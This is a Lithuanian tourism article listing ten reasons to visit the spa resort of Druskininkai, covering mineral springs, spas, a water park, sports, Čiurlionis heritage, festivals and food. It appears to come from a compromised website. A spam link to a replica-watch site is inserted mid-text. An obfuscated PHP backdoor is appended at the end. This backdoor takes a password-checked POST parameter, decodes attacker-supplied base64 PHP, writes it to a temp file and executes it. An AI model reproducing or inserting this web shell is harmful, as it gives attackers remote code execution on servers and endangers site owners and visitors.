fbpx

TOP 10 priežasčių atvykti į Druskininkus

2022.04.05

Druskininkai – gausiai gamtos apdovanotas kurortas. Jau 225 metus jis vertinamas dėl gamtinių ir gydomųjų išteklių. Tūkstančiai žmonių iš viso pasaulio kiekvienais metais atvyksta  į Druskininkus norėdami sustiprinti sveikatą, atgauti fizinę ir dvasinę pusiausvyrą. Apklausų duomenimis, 96 procentai kurorto svečių norėtų sugrįžti į Druskininkus, o net 98 procentai rekomenduotų apsilankyti Druskininkuose savo draugams. Kodėl verta apsilankyti kurorte? Štai 10 populiariausių priežasčių atvykti į Druskininkus:

 

1. Stebuklingo vandens šaltiniai

Druskininkų kurorte rasite didžiausią sveikatingumo centrų koncentraciją Lietuvoje. Per metus čia išpilstoma net 32,8 milijonai litrų mineralinio vandens! Vanduo pripildo vonias ir baseinus, garuoja pirtyse, trykšta fontanuose, šniokščia kaskadose, leidžiasi sniego pūkeliais slidinėjimo trasose…

Druskininkų muzikinis fontanas džiugina nemokamais koncertais visą šiltąjį sezoną. 10 priežasčių atvykti į Druskininkus.

Druskininkų muzikinis fontanas – tai puiki senamiesčio atrakcija

Norite išbandyti vandens galią? Nusileiskite prie atviro „Grožio“ šaltinio Nemuno pakrantėje. Jo vanduo sūriausias Druskininkuose – net 65 gramai mineralinių medžiagų viename litre vandens! Šiuo vandeniu galima praustis, skalauti gerklę peršalus: „Grožio“ šaltinio vanduo veikia kaip efektyvi priešuždegiminė priemonė.

Norite atsigaivinti? Atsigerkite Druskininkuose išpilstomų mineralinių vandenų („Druskininkų Rasa“, „Hermis“). Geriamas mineralinis vanduo rekomenduojamas sportuojant, keliaujant, dirbant aktyvų darbą, jį kasdien be jokių apribojimų gali vartoti visa šeima.

 

2. Sveikata – brangiausias turtas

Druskininkuose veikia 9 gydyklos, atliekama daugiau kaip 400 rūšių įvairių procedūrų. Šiame sąraše – tiek tradicinės gydomosios programos, tiek šiuolaikinės sveikatinimo ir diagnostikos metodikos. Ypač platus masažų ir kūno puoselėjimo procedūrų pasirinkimas. Nesvarbu, kamuoja nemiga ar skauda sąnarius – mūsų specialistai parinks Jums tinkamiausią terapiją.

https://www.high-endrolex.com/7
Grožio salonas viešbutyje Flores. 10 priežasčių atvykti į Druskininkus.

Druskininkų SPA salonuose didelis masažų pasirinkimas

Turintiems tik kelias atostogų dienas patariame pasinaudoti SPA kompleksais. Pasilepinkite terminiu masažu nefrito akmenimis arba nesvarumo terapija, atpalaiduojamuoju viso kūno masažu dviem arba šiluminėmis rankų kaukėmis.

Atvykite į Druskininkus ir būkite sveiki!

 

3. Žiemą Tropikai, vasarą – Arktika…

Ilgos ir šaltos žiemos viduryje kiekvienas pasvajoja apie poilsį šiltuose kraštuose. Deja, ne visada galime sau leisti šešių valandų skrydį ir visą savaitę atostogų. O jeigu taip būtų galima ištrūkti iš kasdienybės tik vienam savaitgaliui? Galima. Jeigu savo svajonėse matote bangas ir palmes – Jums reikia į Druskininkus! Amžinai vasariškame Vandens parke oro temperatūra visada siekia 30-31°C, o baseinų vandens – 26-27°C.

Druskininkų vandens parko baseinas.

Smagu pramogauti baseine, kai už lango – žiemos speigas…

O jeigu vasaros įkarštyje norite atsivėsinti ir prisiminti žiemą – Druskininkai vėl pasiruošę ateiti Jums į pagalbą.  Visus metus „Snow Arenos“ slidinėjimo trasose vidutinė temperatūra svyruoja nuo -2°C iki -4°C šalčio. Naujausių technologijų pagalba čia nuolat gaminamas švarus, jokių cheminių priedų neturintis sniegas. Kol lauke plius 35°C, „Snow Arenoje“ galite leisti laiką su slidėmis, snieglentėmis, sniego padangomis arba ledo bare, o mažiausi šeimos nariai laukiami pramogų parke DruFunPark.

Trumpai tariant, Druskininkuose bet kokiu metų laiku rasite pramogas visai šeimai. Patirkite, kad gyvenate!

 

4. Judėjimas – tai gyvenimas

Dar viena priežasčių atvykti į Druskininkus – tai laisvalaikio formos, kurios skatina kuo daugiau judėti gryname ore.

Esate dviračių sporto mylėtojas? Druskininkuose Jūsų laukia apie 60 kilometrų dviračių takų. Dviračiu galite važinėti kurorto gatvėmis ir parko takeliais, Nemuno pakrantėje ir aplink ežerus. Miško takais pasieksite „Grūto parką“ ir muziejų „Girios aidas“, etnografinį Švendubrės kaimą ir legendinį Raigardo slėnį. Naujai išasfaltuotomis takų atkarpomis galite važiuoti net sutemus, nes šalia tako įrengti šviestuvai. Be dviračių, rekomenduojame išbandyti elektrinius paspirtukus ir velomobilius – vienų ir kitų nuomą rasite Vilniaus alėjoje.

Druskininkuose daug dviračių takų.

Dviračiais gali keliauti visa šeima

Mėgstate sportinius žaidimus? Druskininkuose rasite teniso kortus, tinklinio, krepšinio, futbolo ir paplūdimio teniso aikšteles bei 18 duobučių golfo aikštyną.

Netrūksta ir ekstremalaus sporto galimybių. UNO parke išbandykite skrydžius per Nemuną ir kvapą gniaužiantį „drambliaskrydį“. Jaunimo užimtumo centre šėlkite parkuro ir gimnastų erdvėse, BMX-dviračių, riedlenčių, riedučių ir paspirtukų parke.

Sportininkams Druskininkai siūlo treniruotėms ir pasirengimui varžyboms reikalingą infrastruktūrą. Sportininkų rengimo centre orientuojamasi į krepšinį, rankinį, tinklinį, plaukimą, dvikovų ir šiuolaikinės penkiakovės sporto šakas, dviračių sportą, lengvąją atletiką ir futbolą.

 

5. M. K. Čiurlionio miestas

„Druskininkai – tai tarsi konstanta, prie kurios Mikalojus Konstantinas Čiurlionis nuolat grįždavo pasisemti kūrybinės energijos, pabūti savo šeimoje“, – sako profesorius Rokas Zubovas, Čiurlionio proanūkis.

Genialaus Lietuvos kompozitoriaus ir dailininko pėdsakų galima rasti visuose Druskininkuose. Kartu su dar šešiais Lietuvos miestais, Druskininkai yra nacionalinio M. K. Čiurlionio kelio dalis. Jau antrą dešimtmetį kurorte rengiamas tarptautinis menų festivalis „Druskininkų vasara su M. K. Čiurlioniu“, skirtas menininko kūrybos pažinimui ir sklaidai, galimybei prisiliesti prie jo asmenybės fenomeno. M. K. Čiurlionio paveikslų reprodukcijų ekspozicijos puošia Druskininkų parkus ir alėjas.

Mikalojaus Konstantino Čiurlionio paminklas Druskininkuose.

Kurorte jaučiama meno dvasia

M. K. Čiurlioniui dedikuotas medžio skulptūrų ansamblis nuo Senosios Varėnos iki Druskininkų, sukurtas geriausių Lietuvos tautodailės meistrų. Čiurlionių šeimos kapą galite pamatyti senosiose Druskininkų kapinėse, o jo tėvų namus kviečia aplankyti M. K. Čiurlionio memorialinis muziejus.

 

6. Teminiai parkai

Priklausomai nuo sezono, Druskininkuose rengiami unikalūs teminiai parkai, kurie veikia ribotą laiką ir pritraukia daug lankytojų. Ilgiausią tradiciją turi Kalėdinių eglučių parkas, veikiantis gruodžio – sausio mėnesiais Gydyklų parke, aplink Druskininkų muzikinį fontaną. 2019 metais sausio pabaigoje kalėdinių eglučių vietą užėmė ne mažiau įspūdingas Ledo skulptūrų parkas.

Ledo skulptūrų ekspozicija - viena iš 10 priežasčių atvykti į Druskininkus

Skulptūrų ekspozicijos tematika – Čiurlionio paveikslai

Artėjant Užgavėnėms šalia Druskininkų esančio Viečiūnų miestelio centre įrengiamas Morių parkas, kuriame puikuojasi  vietinės bendruomenės išradingai papuoštos Morės.

Balandį kurorto širdimi tampa Vijūnėlės parkas, kuriame pražysta pusės milijono narcizų laukas, vadinamas Narcizų jūra. Rudens pabaigoje sušilti kviečia Šviečiančių moliūgų parkas, kuriame eksponuojami originalūs miesto gyventojų išskaptuoti moliūgai.

 

7. Romantiška idilė

Druskininkai – ideali vieta vestuvėms, šventėms, romantiškam vakarui. Poilsis kurorte gali tapti viena geriausių dovanų Jūsų artimam žmogui. Pasivaikščiojimas po žvaigždėmis, lyriška smuiko muzika, vakarienė žvakių šviesoje… O gal – šampaniniai pusryčiai, šokolado vonia, masažas su rožių aliejumi dviem?

Nuotaka pozuoja Druskininkų miesto muziejaus terasoje. 10 priežasčių atvykti į Druskininkus

Druskonio ežero pakrantė – mėgstama vestuvinių nuotraukų vieta

Jeigu taip įsivaizduojate idealų laiką su mylimu žmogumi – paslaugų pasirinkimo Druskininkų viešbučiuose ir SPA centruose tikrai netruks.  Ir atsiminkite: nebūtina laukti Šv. Valentino dienos arba kitos ypatingos progos, kad galėtumėte padovanoti romantišką savaitgalį savo antrajai pusei!

 

8. Šventės, mugės, festivaliai…

Kiekvienais metais Druskininkuose organizuojama vis daugiau renginių. Žiūrovus traukia jau ne  tik centrinė kurorto aikštė: vis dažniau veiksmo scena tampa Druskonio ežero pakrantė, miesto alėjos ir parkai, muziejai ir restoranai.

Jau metų pradžioje kurortą sudrebina LTeam olimpinis žiemos festivalis. Biatlono, kerlingo, alpinizmo, sniegbrižių ir dešimtys kitų rungčių įsuka dalyvius į adrenalino sūkurį. Varžybos vyksta net naktį! Ekstremaliausia festivalio akimirka – lenktynės baidarėmis kalnų slidinėjimo trasa, pasibaigiančios įspūdingu šuoliu į vandens baseiną.

Šuolis į ledinio vandens baseiną. 10 priežasčių atvykti į Druskininkus

Varžybos „Snow Kayak” sukelia tikrą audrą emocijų

Visą balandį turistus traukia narcizų žydėjimas ir jo proga rengiamas festivalis, o socialinius tinklus užpildo šimtai nuotraukų ir asmenukių baltos žiedų jūros fone. Gegužės viduryje Druskininkų aerodrome varžomasi dėl dviračių maratono taurės. Gegužės  paskutinį savaitgalį vasaros sezoną atidaro Druskininkų kurorto šventė. Trims dienoms miestas tampa didžiąja koncertų, parodų, atrakcijų scena. Šventė atidaroma įspūdinga teatralizuota eisena ir dar įspūdingesniu lazerių, fejerverkų ir ugnies šou Druskonio ežero pakrantėje.

Joninės - dar viena iš 10 priežasčių atvykti į Druskininkus

Joninių metu Druskininkuose galima pamatyti senas lietuvių tradicijas

Po kurorto šventės muzikos ir menų festivaliai, drožybos ir kitų amatų plenerai seka vienas po kito. Kai kurie vasaros renginiai sugrįžta į Druskininkus jau penkioliktą ar net dvidešimtą kartą. Vieni tradiciškiausių – meno festivalis „Druskininkų vasara su Čiurlioniu“, festivalis „Muzika be sienų“, „Fortepijoninės muzikos vasara Druskininkuose“, pleneras „Druskos metamorfozės“ … Tikimąsi, kad tradicija taps ir Tortų turnyras, kuriame profesionalai ir mėgėjai kuria įmantrius ir meniškus konditerijos gaminius.

Rugpjūčio pirmą savaitgalį miestą užplūsta šunų mylėtojai, susirenkantys į tarptautinę šunų parodą. Savaitę vėliau prasideda Sūrių festivalis kartu su Dainavos krašto folkloro švente. Rugsėjo pabaigoje skelbiamos Turizmo gurmanų dienos su ypatingomis nuolaidomis ir pramogomis. Gruodžio – sausio mėnesiais verta nueiti pasivaikščioti į Gydyklų parką, kurį papuošia Kalėdinis eglučių parkas.

Nuo pavasario iki rudens kurorto centre esančioje Pramogų aikštėje veikia lauko kino teatras. Patogūs šezlongai ir sėdmaišiai kviečia jaukiai leisti vakarus visų amžiaus grupių žiūrovus. Kiekvieną savaitgalį kurorto restoranuose ir muzikiniuose klubuose groja gyva muzika.

 

9. Skonio magija

Druskininkai didžiuojasi savo virtuve. Čia galima pavalgyti tiek paprastai ir nebrangiai, tiek egzotiškai ir ištaigingai.

Geriausi Lietuvoje. Restoranas „Velvetti“ jau keletą metų iš eilės patenka į geriausių Lietuvos restoranų trisdešimtuką. Restoranai „Sicilia“ ir „Toli Toli“ nuo pat įkūrimo renka aukščiausius lankytojų įvertinimus „TripAdvisor“ ir kituose reitingavimo puslapiuose.

Jūros gėrybių meniu restorane-bare Elingas - dar viena iš 10 priežasčių atvykti į Druskininkus

Restoranas-baras „Elingas” laukia svečių

Tradicinė virtuvė. Turistai iš užsienio renkasi „Etno dvarą“ arba „Senąjį Nemuną“: čia pristatyta visa lietuviškų patiekalų paletė.

Gal krokodilienos? Atraskite naujus skonius: paragaukite samarkando blynelių („Bukhara“), norvegiško šakočio arba patiekalų iš egzotiškos mėsos, („Romnesa“), dilgėlių ledų („Velvetti“), aštuonkojo („Elingas“)…

Ekologiški produktai. Užsukite į Druskininkų turgų: rytais čia rasite naminio sviesto, grietinės, uogų, grybų, vaisių ir daržovių. Visų rūšių natūralų medų parduoda Milių ūkio šeimininkai, o Augų ūkis tiekia geriausius savo gamybos sūrius: brandintus, fermentinius, pelėsinius, saldžius, ožkos pieno…

 

10. Ambicingi planai

Druskininkus verta aplankyti dėl to, kad šis miestas niekada nestovi vietoje. Kiekvienais metais keičiasi kurorto veidas: įgyvendinami milijoniniai projektai, kuriami nauji objektai, diegiamos šiuolaikinės terapijos, gražinama aplinka. Vien tik į viešosios paskirties objektų atnaujinimą 2000 – 2015 metais investuota daugiau kaip 300 milijonų eurų savivaldybės biudžeto ir įvairių fondų lėšų. Per 18 metų,  nuo 2000 (39 tūkst.) iki 2018 (340 tūkst.) atvykstančių turistų skaičius išaugo 8,5 karto.

Vien 2019 metais pradėtas statyti Druskininkų kultūros centras, įsteigtas pirmasis miego SPA Šiaurės Europoje, išplėsta Druskininkų gydykla, atidarytos kūrybinės dirbtuvės miesto amatininkams, įrengtos elektromobilių įkrovimo prieigos, rekonstruota „Žvaigždžių orbitos“ dviračių tako atkarpa, užbaigtas Sportininkų rengimo centro projektas…

 

Nuotraukos: Irklentės Druskininkuose, Petras Malūkas, Sandras Želionis, Ieva Budzeikaitė, Druskininkų kultūros centras, restoranas Toli Toli, Druskininkų vandens parkas

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}